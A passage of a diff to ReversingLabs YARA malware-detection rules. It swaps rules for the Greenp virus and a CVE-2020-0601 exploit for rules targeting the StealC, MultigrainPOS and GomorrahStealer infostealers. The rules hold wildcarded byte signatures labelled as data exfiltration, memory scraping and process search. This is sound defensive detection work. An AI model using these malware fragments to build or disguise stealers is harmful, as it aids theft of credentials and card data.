-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ca6df34ee2ad9d93e35b0d1a2d4765f681f3981ffe2786bbc822c3090212fd02"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/infostealer/Win32.Infostealer.StealC.yara#L1-L57"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bea1cf370150387eb185deff726e10e660e7eb571c20d22878def08b36f457bf"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Greenp"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "StealC"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$greenp_body_1 = {
-            68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01
-            50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC
-            6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00
-            FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ??
-            ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF
-            95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46
-            0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4
-            68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ??
-            ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1
-            8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43
-            10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42
-            50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ??
-            ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99
+		$resolve_windows_api = {
+            55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ??
+            89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35
         }
-		$greenp_body_2 = {
-            68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95
-            ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ??
-            ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ??
-            ?? ?? C3
+		$load_sqlite3_functions = {
+            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D
+            45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ??
+            B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70
+            ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ??
+            A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3
+        }
+		$check_license_expiration_date = {
+            55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB
+            AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24
+            ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D
+            4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ??
+            8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
+            8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ??
+            8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 8B E5 5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $greenp_body_1 at pe.entry_point ) and $greenp_body_2
+		uint16( 0 ) == 0x5A4D and ( $resolve_windows_api ) and ( $load_sqlite3_functions ) and ( $check_license_expiration_date )
 }
-
-rule REVERSINGLABS_Win32_Exploit_CVE20200601 : TC_DETECTION MALICIOUS EXPLOIT CVE_2020_0601 FILE
+rule REVERSINGLABS_Win32_Infostealer_Multigrainpos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects CVE-2020-0601 exploit."
+		description = "Yara rule that detects MultigrainPOS infostealer."
 		author = "ReversingLabs"
-		id = "6a03fd5e-3b7f-5b71-b897-5cac81721a56"
+		id = "595c04af-802f-556d-b22b-23cac79b256e"
 		date = "2020-07-15"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/exploit/Win32.Exploit.CVE20200601.yara#L3-L253"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e4d915560ad72e0fde63276f9ffece00535c7983125efaa8298adc11d5e54817"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/infostealer/Win32.Infostealer.MultigrainPOS.yara#L1-L88"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9808c95b850a54677c4132057b8372cabf0159920b7e0e6834a83f0d39c088fa"
 		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, EXPLOIT, CVE-2020-0601, FILE"
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "EXPLOIT"
-		exploit = "CVE-2020-0601"
-		tc_detection_type = "Exploit"
-		tc_detection_name = "CVE-2020-0601"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$oid_prime_explicit = {
-            06 07 2A 86 48 CE 3D 01 01
-        }
-		$ecc_public_key_1 = {
-            04 47 45 0E 96 FB 7D 5D BF E9 39 D1 21 F8 9F 0B
-            B6 D5 7B 1E 92 3A 48 59 1C F0 62 31 2D C0 7A 28
-            FE 1A A7 5C B3 B6 CC 97 E7 45 D4 58 FA D1 77 6D
-            43 A2 C0 87 65 34 0A 1F 7A DD EB 3C 33 A1 C5 9D
-            4D A4 6F 41 95 38 7F C9 1E 84 EB D1 9E 49 92 87
-            94 87 0C 3A 85 4A 66 9F 9D 59 93 4D 97 61 06 86
-            4A
-        }
-		$ecc_public_key_2 = {
-            04 84 13 C9 D0 BA 6D 41 7B E2 6C D0 EB 55 5F 66
-            02 1A 24 F4 5B 89 69 47 E3 B8 C2 7D F1 F2 02 C5
-            9F A0 F6 5B D5 8B 06 19 86 4F 53 10 6D 07 24 27
-            A1 A0 F8 D5 47 19 61 4C 7D CA 93 27 EA 74 0C EF
-            6F 96 09 FE 63 EC 70 5D 36 AD 67 77 AE C9 9D 7C
-            55 44 3A A2 63 51 1F F5 E3 62 D4 A9 47 07 3E CC
-            20
-        }
-		$ecc_public_key_3 = {
-            04 A7 56 7A 7C 52 DA 64 9B 0E 2D 5C D8 5E AC 92
-            3D FE 01 E6 19 4A 3D 14 03 4B FA 60 27 20 D9 83
-            89 69 FA 54 C6 9A 18 5E 55 2A 64 DE 06 F6 8D 4A
-            3B AD 10 3C 65 3D 90 88 04 89 E0 30 61 B3 AE 5D
-            01 A7 7B DE 7C B2 BE CA 65 61 00 86 AE DA 8F 7B
-            D0 89 AD 4D 1D 59 9A 41 B1 BC 47 80 DC 9E 62 C3
-            F9
-        }
-		$ecc_public_key_4 = {
-            04 CD 0F 5B 56 82 DF F0 45 1A D6 AD F7 79 F0 1D
-            C9 AC 96 D6 9E 4E 9C 1F B4 42 11 CA 86 BF 6D FB
-            85 A3 C5 E5 19 5C D7 EE A6 3F 69 67 D8 78 E2 A6
-            C9 C4 DB 2D 79 2E E7 8B 8D 02 6F 31 22 4D 06 E3
-            60 72 45 9D 0E 42 77 9E CE CF E5 7F 85 9B 18 E4
-            FC CC 2E 72 D3 16 93 4E CA 99 63 5C A1 05 2A 6C
-            06
-        }
-		$ecc_public_key_5 = {
-            04 57 CF EA B3 39 4D 3F A1 21 E0 6E 2F 38 72 C6
-            87 97 F3 85 0B 47 E7 0F 51 C8 D1 F4 99 9B CA 59
-            65 FF 4C F9 EA 0B B7 25 D5 D2 F6 EC 31 2D 32 62
-            12 D7 76 86 A7 FA 38 C9 65 D4 FE 73 E2 84 39 F8
-            4C 49 62 13 DD BA D5 88 A0 5F 3D C8 4F B0 3F 8F
-            A1 50 11 E4 93 46 AD C3 5F CB F1 A4 6A 95 56 E8
-            C0
-        }
-		$ecc_public_key_6 = {
-            04 D1 D9 4A 8E 4C 0D 84 4A 51 BA 7C EF D3 CC FA
-            3A 9A B5 A7 63 13 3D 01 E0 49 3E FA C1 47 C9 92
-            B3 3A D7 FE 6F 9C F7 9A 3A 0F F5 0E 0A 0A C3 3F
-            C8 E7 12 14 8E D5 D5 6D 98 2C B3 71 32 0A EB 2A
-            BD F6 D7 6A 20 0B 67 45 9C D2 B2 BF 53 22 66 09
-            5D DB 11 F3 F1 05 33 58 A3 E2 B8 CF 7C CD 82 9B
-            BD
-        }
-		$ecc_public_key_7 = {
-            04 4A EE 58 AE 4D CA 66 DE 06 3A A3 11 FC E0 18
-            F0 6E 1C BA 2D 30 0C 89 D9 D6 EE 9B 73 83 A9 23
-            15 8C 2F 59 8A 5A DD 14 EA 9D 59 2B 43 B7 06 EC
-            32 B6 BA EE 41 B5 AD 5D A1 85 CC EA 1D 14 66 A3
-            67 7E 46 E2 94 F3 E7 B6 56 A1 15 59 A1 4F 37 97
-            B9 22 1E BD 11 EB F4 B2 1F 5E C3 14 9A E5 D9 97
-            99
-        }
-		$ecc_public_key_8 = {
-            04 DD A7 D9 BB 8A B8 0B FB 0B 7F 21 D2 F0 BE BE
-            73 F3 33 5D 1A BC 34 EA DE C6 9B BC D0 95 F6 F0
-            CC D0 0B BA 61 5B 51 46 7E 9E 2D 9F EE 8E 63 0C
-            17 EC 07 70 F5 CF 84 2E 40 83 9C E8 3F 41 6D 3B
-            AD D3 A4 14 59 36 78 9D 03 43 EE 10 13 6C 72 DE
-            AE 88 A7 A1 6B B5 43 CE 67 DC 23 FF 03 1C A3 E2
-            3E
-        }
-		$ecc_public_key_9 = {
-            04 D7 66 B5 1B DB AE B3 60 EE 46 EA 88 63 75 3B
-            2A 94 6D F3 5F 12 F6 E3 0F 9E B6 0A 14 53 48 52
-            C8 DC 3A B3 CB 48 20 26 12 4E FA 89 84 D4 DF 91
-            E4 29 7D 28 01 D9 DB 18 43 69 A1 1F B5 D3 86 16
-            DC C7 7F 67 23 DF DF 31 31 83 03 35 70 B1 4B B7
-            C8 17 BB 51 CB DC 94 17 DB EA 09 3B 76 12 DE AA
-            B5
-        }
-		$ecc_public_key_10 = {
-            04 15 B1 E8 FD 03 15 43 E5 AC EB 87 37 11 62 EF
-            D2 83 36 52 7D 45 57 0B 4A 8D 7B 54 3B 3A 6E 5F
-            15 02 C0 50 A6 CF 25 2F 7D CA 48 B8 C7 50 63 1C
-            2A 21 08 7C 9A 36 D8 0B FE D1 26 C5 58 31 30 28
-            25 F3 5D 5D A3 B8 B6 A5 B4 92 ED 6C 2C 9F EB DD
-            43 89 A2 3C 4B 48 91 1D 50 EC 26 DF D6 60 2E BD
-            21
-        }
-		$ecc_public_key_11 = {
-            04 03 47 7B 2F 75 C9 82 15 85 FB 75 E4 91 16 D4
-            AB 62 99 F5 3E 52 0B 06 CE 41 00 7F 97 E1 0A 24
-            3C 1D 01 04 EE 3D D2 8D 09 97 0C E0 75 E4 FA FB
-            77 8A 2A F5 03 60 4B 36 8B 16 23 16 AD 09 71 F4
-            4A F4 28 50 B4 FE 88 1C 6E 3F 6C 2F 2F 09 59 5B
-            A5 5B 0B 33 99 E2 C3 3D 89 F9 6A 2C EF B2 D3 06
-            E9
-        }
-		$ecc_public_key_12 = {
-            04 92 A0 41 E8 4B 82 84 5C E2 F8 31 11 99 86 64
-            4E 09 25 2F 9D 41 2F 0A AE 35 4F 74 95 B2 51 64
-            6B 8D 6B E6 3F 70 95 F0 05 44 47 A6 72 38 50 76
-            95 02 5A 8E AE 28 9E F9 2D 4E 99 EF 2C 48 6F 4C
-            25 29 E8 D1 71 5B DF 1D C1 75 37 B4 D7 FA 7B 7A
-            42 9C 6A 0A 56 5A 7C 69 0B AA 80 09 24 6C 7E C1
-            46
-        }
-		$ecc_public_key_13 = {
-            04 A2 D5 9C 82 7B 95 9D F1 52 78 87 FE 8A 16 BF
-            05 E6 DF A3 02 4F 0D 07 C6 00 51 BA 0C 02 52 2D
-            22 A4 42 39 C4 FE 8F EA C9 C1 BE D4 4D FF 9F 7A
-            9E E2 B1 7C 9A AD A7 86 09 73 87 D1 E7 9A E3 7A
-            A5 AA 6E FB BA B3 70 C0 67 88 A2 35 D4 A3 9A B1
-            FD AD C2 EF 31 FA A8 B9 F3 FB 08 C6 91 D1 FB 29
-            95
-        }
-		$ecc_public_key_14 = {
-            04 98 E9 2F 3D 40 72 A4 ED 93 22 72 81 13 1C DD
-            10 95 F1 C5 A3 4E 71 DC 14 16 D9 0E E5 A6 05 2A
-            77 64 7B 5F 4E 38 D3 BB 1C 44 B5 7F F5 1F B6 32
-            62 5D C9 E9 84 5B 4F 30 4F 11 5A 00 FD 58 58 0C
-            A5 F5 0F 2C 4D 07 47 13 75 DA 97 97 97 6F 31 5C
-            ED 2B 9D 7B 20 3B D8 B9 54 D9 5E 99 A4 3A 51 0A
-            31
-        }
-		$ecc_public_key_15 = {
-            04 0D 30 5E 1B 15 9D 03 D0 A1 79 35 B7 3A 3C 92
-            7A CA 15 1C CD 62 F3 9C 26 5C 07 3D E5 54 FA A3
-            D6 CC 12 EA F4 14 5F E8 8E 19 AB 2F 2E 48 E6 AC
-            18 43 78 AC D0 37 C3 BD B2 CD 2C E6 47 E2 1A E6
-            63 B8 3D 2E 2F 78 C4 4F DB F4 0F A4 68 4C 55 72
-            6B 95 1D 4E 18 42 95 78 CC 37 3C 91 E2 9B 65 2B
-            29
+		category = "MALWARE"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "MultigrainPOS"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$data_exfiltration_v10_1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 1D ?? ?? ?? ?? 56 57 8B 3D ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F
+            43 45 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81
+            FE ?? ?? ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 75 ?? 83 7D ?? ?? 5F 5E 5B 72 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 CD B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
+            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF D3 EB
         }
-		$ecc_public_key_16 = {
-            04 1A AC 54 5A A9 F9 68 23 E7 7A D5 24 6F 53 C6
-            5A D8 4B AB C6 D5 B6 D1 E6 73 71 AE DD 9C D6 0C
-            61 FD DB A0 89 03 B8 05 14 EC 57 CE EE 5D 3F E2
-            21 B3 CE F7 D4 8A 79 E0 A3 83 7E 2D 97 D0 61 C4
-            F1 99 DC 25 91 63 AB 7F 30 A3 B4 70 E2 C7 A1 33
-            9C F3 BF 2E 5C 53 B1 5F B3 7D 32 7F 8A 34 E3 79
-            79
+		$memory_scraping_v10_1 = {
+            6A ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? EB ?? 3C ?? 7C ?? 3C ?? 7E ?? 8A 46 ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 74
         }
-		$ecc_public_key_17 = {
-            04 E1 FD 8E B8 43 24 AB 96 7B 85 C2 BA 0B AD 8D
-            E0 3A E3 24 B9 D2 B1 BE 88 3A CA BF 4A B8 F9 EF
-            2C 2F AF 51 50 3C 47 75 6C F8 94 B7 9B FC 28 1E
-            C5 54 CC 63 9D 16 4B 53 C1 E7 20 AB CD AC 25 D2
-            7F 8F C2 C1 5A 82 5E 30 8B 7A 54 CE 03 B5 91 7F
-            AA 94 D0 D1 8A 48 CC 82 05 26 A1 D5 51 12 D6 7B
-            36
+		$process_search_v10_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 1D ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? 8D
+            85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75
         }
-		$ecc_public_key_18 = {
-            04 19 E7 BC AC 44 65 ED CD B8 3F 58 FB 8D B1 57
-            A9 44 2D 05 15 F2 EF 0B FF 10 74 9F B5 62 52 5F
-            66 7E 1F E5 DC 1B 45 79 0B CC C6 53 0A 9D 8D 5D
-            02 D9 A9 59 DE 02 5A F6 95 2A 0E 8D 38 4A 8A 49
-            C6 BC C6 03 38 07 5F 55 DA 7E 09 6E E2 7F 5E D0
-            45 20 0F 59 76 10 D6 A0 24 F0 2D DE 36 F2 6C 29
-            39
+		$service_creation_v10_1 = {
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 5E 8B 4C 24 ?? 33 CC E8 ?? ??
+            ?? ?? 8B E5 5D C3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15
         }
-		$ecc_public_key_19 = {
-            04 B8 C6 79 D3 8F 6C 25 0E 9F 2E 39 19 1C 03 A4
-            AE 9A E5 39 07 09 16 CA 63 B1 B9 86 F8 8A 57 C1
-            57 CE 42 FA 73 A1 F7 65 42 FF 1E C1 00 B2 6E 73
-            0E FF C7 21 E5 18 A4 AA D9 71 3F A8 D4 B9 CE 8C
-            1D
+		$process_search_v11_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8B 7D ?? FF 15 ??
+            ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 8D 49 ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ??
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF D3 EB ?? 8D 8D
+            ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 66 89
+            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 EB ?? 8D A4 24 ??
+            ?? ?? ?? EB ?? 8D 49 ?? 0F B7 84 0D ?? ?? ?? ?? 66 89 84 0D ?? ?? ?? ?? 8D 49 ?? 66
+            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
         }
-		$ecc_public_key_20 = {
-            04 C7 11 16 2A 76 1D 56 8E BE B9 62 65 D4 C3 CE
-            B4 F0 C3 30 EC 8F 6D D7 6E 39 BC C8 49 AB AB B8
-            E3 43 78 D5 81 06 5D EF C7 7D 9F CE D6 B3 90 75
-            DE 0C B0 90 DE 23 BA C8 D1 3E 67 E0 19 A9 1B 86
-            31 1E 5F 34 2D EE 17 FD 15 FB 7E 27 8A 32 A1 EA
-            C9 8F C9 7E 18 CB 2F 3B 2C 48 7A 7D A6 F4 01 07
-            AC
+		$memory_scraping_v11_1 = {
+            6A ?? 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 6A ??
+            56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8
         }
-		$ecc_public_key_21 = {
-            04 DE CD BB 70 20 F1 25 20 B4 94 E8 D7 B4 3B 0F
-            6E 87 DD AB AC CF 4D 40 2F 81 33 6B 59 09 18 D6
-            87 0D 26 23 9C B4 8D 95 9D 76 9F A5 B9 06 42 E6
-            AD 36 B2 C4 B3 AE 7A 3C 08 D5 CB 9D 3A 5E 45 21
-            6C 0B E3 20 F5 9B C2 DD 44 33 E3 42 B9 EA F2 28
-            42 92 AA FE 0C 07 CA 8A 13 99 3B 62 00 ED DA F3
-            35
+		$data_exfiltration_v11_1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8A 5D ?? 56 57 8B 3D ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F 43 45 ??
+            6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 FE ?? ??
+            ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 74 ?? 84 DB 74 ?? 33 F6 83 7D ?? ?? 72 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
+            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 84 DB 74 ?? EB ?? BE ?? ?? ?? ?? EB
         }
-		$ecc_public_key_22 = {
-            04 5C D1 EE 57 0D D1 EF 81 7C 26 91 62 C3 6B E7
-            FC 73 A9 A0 C3 37 44 DC D6 F8 31 E2 77 93 5F 8F
-            EB E3 ED 38 73 F5 FC 8B 55 B9 14 A5 8F 2C 44 28
-            19 AF 5D FB DE 09 58 C9 29 B3 A9 99 D3 75 13 3C
-            A9
+		$service_creation_v11_1 = {
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 4C 24 ?? 33 CC E8 ?? ?? ??
+            ?? 8B E5 5D C3 8D 44 24 ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $oid_prime_explicit ) and ( any of ( $ecc_public_key_* ) ) and ( pe.number_of_signatures > 0 )
+		uint16( 0 ) == 0x5A4D and ( ( $data_exfiltration_v10_1 and $memory_scraping_v10_1 and $process_search_v10_1 and $service_creation_v10_1 ) or ( $process_search_v11_1 and $memory_scraping_v11_1 and $data_exfiltration_v11_1 and $service_creation_v11_1 ) )
 }
-rule REVERSINGLABS_Win32_Downloader_Dlmarlboro : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Infostealer_Gomorrahstealer : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects dlMarlboro downloader."
+		description = "Yara rule that detects GomorrahStealer infostealer."
 		author = "ReversingLabs"
-		id = "4c99b5a4-dc6b-579b-b1bd-bd4c93c6e68c"
-		date = "2020-07-23"
-		modified = "2020-07-23"
+		id = "f3c14d23-47a2-5b09-8f48-0c2f9350516a"
+		date = "2024-11-27"
+		modified = "2024-11-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/downloader/Win32.Downloader.dlMarlboro.yara#L1-L79"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "465a3b3a9686889001ac0b929d0349e44b6015eaeed3386361366def5013164a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/infostealer/ByteCode.MSIL.Infostealer.GomorrahStealer.yara#L1-L111"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "75d86ea2ef9f24487ef54979508170651cd60abba6daa4c3117e20a77bb3b086"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
